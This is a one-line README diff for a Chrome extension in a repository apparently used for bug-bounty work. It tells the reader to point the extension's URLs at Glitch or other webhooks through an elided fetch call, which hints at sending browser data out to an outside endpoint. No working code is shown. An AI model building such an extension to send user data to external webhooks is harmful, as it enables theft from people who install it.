mshafeequet/bugbounty/README.md

-its a Chrome browser extension change URLS //use glitch or other webhooksin Json code
+its a Chrome browser extension change URLS //use glitch or other webhooksin Js code //fetch https://......